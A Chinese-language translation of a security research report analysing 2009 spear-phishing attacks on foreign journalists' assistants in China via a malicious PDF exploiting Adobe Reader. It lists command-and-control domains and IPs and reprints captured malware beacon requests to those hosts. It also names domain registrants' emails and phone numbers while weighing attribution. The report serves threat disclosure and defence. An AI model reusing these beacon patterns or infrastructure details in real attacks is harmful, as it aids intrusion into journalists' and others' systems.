By Nart Villeneuve and Greg Walton [Translation: 黄健]
概述
近期,陸續發生多起針對駐華記者的惡意軟體攻擊事件。攻擊的對象均為在跨國傳媒公司工作的駐華員工。這些機構包括:路透社、海峽時報、道鐘斯、法新社和安莎通訊社(1)。這些員工都曾收到過一封署名為“Pam”的電子郵件,並且寄件者自稱是海峽時報的編輯。郵件包含一個含有惡意程式碼的PDF文檔。當PDF 文檔被打開時,文檔中的惡意程式碼便試圖通過Adobe Reader軟體的漏洞入侵操作者的電腦。
這一系列攻擊事件發生時,恰逢中華人民共和國為慶祝建國六十周年全面提升安保級別(2)。而這些安保措施也已向互聯網擴展,因為近期許多反網路審查軟體的開發者紛紛反應,國慶期間中國境內網路封鎖的力度有很大程度的加強,以阻止網路使用者登錄國外媒體和新聞機構的網站(3)。
這則簡報,乃是惡意軟體研究所(Malware Lab)和資訊戰監控(Information Warfare Monitor)接受某駐華新聞機構(北京外國駐華記者協會會員(4))的委託,對其公司遭到的一系列惡意攻擊所做的抽樣分析。
主要發現:
* 電子郵件的正文,以及附帶的惡意文檔,均使用地道英語寫成並包含準確資訊。郵件的具體內容講的是通知收件人,某位記者計畫前往中國寫一篇有關中國在全球經濟中的地位的報導。附件中提及的所有個人均為真實姓名,且都是對於中國經濟現狀有所瞭解的業內人士。
* 郵件附件裡攜帶的惡意程式碼指向的主控伺服器功能變數名稱,在2007年曾經被用於同樣目的。和先前的記錄一樣,此功能變數名稱解析後的真實IP地址只存在很短時間。
* 此惡意軟體試圖通過Adobe PDF Reader軟體的漏洞實施攻擊,類似特徵的惡意程式碼曾於2008年在西藏流亡政府駐倫敦的辦公室的電腦中被發現,並被包含在政治主題的附件裡。
* 此次攻擊,惡意程式碼中指向的IP地址均位於臺灣境內。其中之一是臺灣國立中央大學(National Central University)師生用於下載殺毒軟體的伺服器位址。另一個IP位址則屬於臺灣學術網路(Taiwan Academic Network)。由於攻擊者很可能已經將惡意程式碼植入師生使用的殺毒軟體中,因此這無疑是巨大的網路安全隱患。
分析
發給外國駐華記者署名為“Pam”的電子郵件,似乎具有很強的針對性。無論是郵件正文還是PDF附件(Interviewlist.pdf)的內容,都可以看出是為記者們量身定做的。郵件本身的內容涉及安排記者在中國和具體受訪人會面,而PDF文檔中則包含了相關連絡人的列表,且姓名、酒店名稱、地址均為真實。此外,郵件裡提及的來華目的——研究“年度經濟調查”——也和2009年9月8日世界經濟論壇(World Economic Forum)在中國大連發表的全球競爭力報告(Global Competitiveness Report)中的相關內容有明顯關聯(5)。
郵件PDF附件中的惡意程式碼通過Adobe Reader的軟體漏洞,向操作者的電腦植入惡意軟體。根據Virus Total網站的測試結果,在所使用的41種殺毒軟體中,僅有3種能夠檢測出包含在該PDF文檔中的惡意程式碼(6)。
打開後的PDF文檔中包含了一個連絡人列表,列表中提及的姓名、頭銜等內容均為真實。然而,有些個別連絡人的工作單位內容過時,這說明此文檔並非最新創建。以此推測,這篇文檔可能是從先前某台被攻陷的主機上竊取的真實文檔,在加入惡意程式碼後用來誘使收件人打開閱讀。
當附件被打開後,惡意軟體便被悄然植入操作者的電腦。
惡意軟體試圖通過功能變數名稱伺服器解析以下三個功能變數名稱:“mail.amberice.com”,“menberservice.3322.org”,和“zwy2007.pc- officer.com”。大部分時間裡,這些功能變數名稱無法被功能變數名稱伺服器解析成有效IP位址,但偶爾,這些功能變數名稱可以在短時間內被解析到有效的IP地址。比如,其中兩個功能變數名稱曾被解析到以下對應的IP位址:
menberservice.3322.org | 140.115.182.230
zwy2007.pc-officer.com | 210.240.85.250
其中,功能變數名稱“zwy2007.pc-officer.com”被解析到“210.240.85.250”,這是一個臺灣學術網路內部的IP位址。
而功能變數名稱“pc-officer.com”則對應的是一個臭名昭著的惡意網站。2007年,Maarten Van Horenbeeck深入研究了幾起有針對性的攻擊事件,當時的攻擊借“就中國侵犯人權向國際奧會情願”為主題(7)。在當時的案例中,惡意軟體曾試圖連接以下功能變數名稱:
ihe1979.3322.org
ding.pc-officer.com | 61.219.152.125
之前的這次攻擊也使用同樣的功能變數名稱解析方法——這些功能變數名稱僅在短時間內被解析到有效的IP地址。
今年早些時候,F-Secure的人員在類似的案例中(8),也發現惡意軟體曾試圖連接以下功能變數名稱:
ihe1979.3322.org
feng.pc-officer.com | 216.255.196.154
feng.pc-officer.com | 211.234.122.84
功能變數名稱解析也有同樣特徵——這些功能變數名稱僅在短時間內被解析到有效的IP地址。
功能變數名稱“menberservice.3322.org”最終解析成的IP地址(140.115.182.230)能夠被反向解析成 “avirus.is.ncu.edu.tw”。這一主機上的位址(https://avirus.is.ncu.edu.tw:4343 /officescan/console/html/ClientInstall/)是臺灣國立中央大學師生用於下載殺毒軟體的伺服器位址(9)。由於攻擊者很可能已經將惡意程式碼植入師生使用的殺毒軟體中,因此這無疑是巨大的網路安全隱患。
menberservice.3322.org | 140.115.182.230 | avirus.is.ncu.edu.tw
和以上主機建立聯繫後,惡意軟體發送如下資訊:
POST http://menberservice.3322.org:8000/LFDXFiRcVs3902.rar HTTP/1.1
User-Agent: Mozilla/4.2.20 (compatible; MSIE 5.0.2; Win32)
Host: menberservice.3322.org
Content-Length: 682
Proxy-Connection: keep-alive
Pragma: no-cache
.new_host_42
HTTP/1.1 200 OK
Date: Tue Sep 22 21:41:10 2009
Server: Apache/1.3.20 (Unix) (Red-Hat/Linux)
Content-Length: 32
Content-Type: application/octet-stream
Proxy-Connection: keep-alive
此特徵和今年早些時候ThreatExpert記錄的特徵相吻合(10)。當時,名為“Urgent Appeal to Secretary Hillary Clinton.doc”和“Days with ITSN Tibet in My Eyes.doc”的檔中包含的惡意程式碼曾和功能變數名稱為“mmwbzhij.meibu.com”的主機的8585和8686號埠建立連接。
http://mmwbzhij.meibu.com:8686/[random characters].[random file extension]
where [random characters] string may look similar to:
* qRXycRXuwJ11749
* PqJNBkcPDm18630
* ZPDPyZkZcV23661
and [random file extension] can be any of the following: rm, mov, mp3, pdf.
這一特徵又和“資訊戰監控”在《跟蹤幽靈網》(Tracking GhostNet)報告中的記錄相吻合(11)。當時,在分析了一台西藏流亡政府駐倫敦的辦公室裡被攻陷的電腦中後發現,電腦中的惡意軟體和功能變數名稱為“oyd.3322.org”的主機建立了連接,此功能變數名稱解析後的IP位址為“58.141.132.66”,埠4501。如下:
POST http://oyd.3322.org:4501/TkBXPPXkRL14509.pdf HTTP/1.1
User-Agent: Mozilla/4.8.20 (compawhichplatform.htmtible; MSIE 5.0.2; Win32)
Host: oyd.3322.org
Content-Length: 46
Proxy-Connection: keep-alive
Pragma: no-cache
new_host_24
HTTP/1.1 200 OK
Date: Wed Oct 01 23:05:15 2008
Server: Apache/1.3.20 (Unix) (Red-Hat/Linux)
Content-Length: 44
Content-Type: application/octet-stream
Proxy-Connection: keep-alive
此後,在這一辦公室裡的另一次感染事件中,發現惡意軟體和功能變數名稱為“mmwbzhij.meibu.com”的主機建立了連接,此功能變數名稱解析後的IP位址為“216.131.67.95”,埠8686。如下:
POST http://mmwbzhij.meibu.com:8686/yDFDcVoFma29957.mp3 HTTP/1.1
User-Agent: Mozilla/4.8.20 (compatible; MSIE 5.0.2; Win32)
Host: mmwbzhij.meibu.com
Content-Length: 32
Proxy-Connection: keep-alive
Pragma: no-cache
.new_host_23
HTTP/1.1 200 OK
Date: Fri Apr 10 22:49:22 2009
Server: Apache/1.3.20 (Unix) (Red-Hat/Linux)
Content-Length: 32
Content-Type: application/octet-stream
Proxy-Connection: keep-alive
功能變數名稱“3322.org”和“meibu.com”為動態功能變數名稱伺服器,惡意軟體使用這些伺服器可以將功能變數名稱解析到攻擊者自己掌控的 IP地址。這樣一來,攻擊者就不需要公開註冊這些功能變數名稱,因此,攻擊者通常傾向於使用這樣的動態功能變數名稱伺服器來實施攻擊(12)。攻擊者除了將IP位址定向到臺灣學術網之外,還曾利用美國Black Oak Computers公司和韓國C&M Communication公司的網路,展開攻擊。
功能變數名稱為“pc-officer.com”的主控伺服器的IP地址,過去曾經被解析到,包括臺灣國立中央大學在內的美國One Eighty Networks公司、韓國KIDC公司和臺灣中華電信(HINET)的網路。
責任歸屬相關問題
通常來說,確定誰應該為這類攻擊事件負責的問題是困難的。然而,通過分析功能變數名稱註冊等相關資訊,有時也可以為我們提供一些線索。
功能變數名稱“pc-officer.com”和“amberice.com”於2007年由“wei zheng”(音譯:鄭偉)註冊。註冊時提供的電子郵寄地址為:“sunny@hetu.cn”,電話號碼:86-010-4564654。這些資訊和註冊另一些功能變數名稱時所使用的資訊吻合。比如,“wei zheng”還註冊過功能變數名稱“fclinux.com”,提供的電子郵寄地址為:“asdfi@hotmail.com”,電話號碼:86 10 13810358162。“wei zheng”還註冊了功能變數名稱“winxpupdata.com”,提供的電子郵寄地址為:“afsaf@hotmail.com”,電話號碼:86 10 13810358162。另外,北京和圖時代網路技術有限公司(Hetu Time Networking Technology)還註冊過許多五花八門的功能變數名稱,如“ag365.com”,註冊者為“lin long”(音譯:林龍),電子郵寄地址為“harry@hetu.cn”,同時,技術相關連絡人為“lin hai”(音譯:林海),電子郵寄地址為“sunny@hetu.cn”。
這裡,和圖公司和攻擊者的關係不明,因為前者是一家功能變數名稱註冊和網路空間提供商。註冊者提供的資訊可能和攻擊者本人無關,但和攻擊者指使的第三方有關。
考查責任歸屬問題還有另一條途徑。我們無法判斷受雇於外國媒體公司記者的電子郵寄地址是如何被攻擊者獲得的(13)。但路透社關於此事的新聞報導中提到的一點值得注意:
星期一發生的“Pam Bourdon”郵件攻擊事件針對駐華外國記者的新聞助理,這些助理的姓名通常不在新聞報導中出現,並且按規定是通過向外交部負責的外交人員服務局雇用的(14)。
考慮到這些新聞助理的聯繫資訊不出現在公開場合,而只在中國外交部登記,這不能不引起人們對於後者在此次事件中扮演的角色產生質疑。然而,另一種解釋是,攻擊者從2007年便開始積極入侵和收集相關資訊,手中的聯繫方式很有可能是從先前攻佔的電腦中竊取到的。事實上,電子郵件正文和附件中的準確聯繫資訊正是通過這種方式竊取到的。
沒有證據顯示,中國政府直接涉及這一系列攻擊事件。
然而,此次事件發生的時間和針對的物件確實容易引起人們的猜忌。隨著中華人民共和國六十周年大慶的日益臨近,人們很難把針對路透社、海峽時報、道鐘斯、法新社和安莎通訊社的攻擊看成孤立事件。這些機構收到量身定制的攻擊,但卻動機不明。除此之外,利用捕獲的臺灣國立中央大學和臺灣學術網路的電腦實施攻擊,無疑將使已經緊張的台海關係雪上加霜。
關於資訊戰監控(IWM)
資訊戰監控(www.infowar- monitor.net)關注戰略領域中電子技術的科技發展。資訊戰監控是加拿大多倫多大學蒙克國際研究中心(Munk Centre for International Studies)的“公民實驗室”(Citizen Lab)和位於渥太華的智囊機構SecDev集團攜手創辦的公私合營機構。
關於惡意軟體研究所 (www.malwarelab.org)
惡意軟體研究所是一個由自願者組成的獨立科研實驗室,專門調查和披露為達到政治目的、針對公民社會團體的惡意軟體攻擊事件。惡意軟體研究所將收集的專業資料與社會政治背景相結合,從而更好地認識攻擊者的能力和動機以及攻擊所產生的總體影響。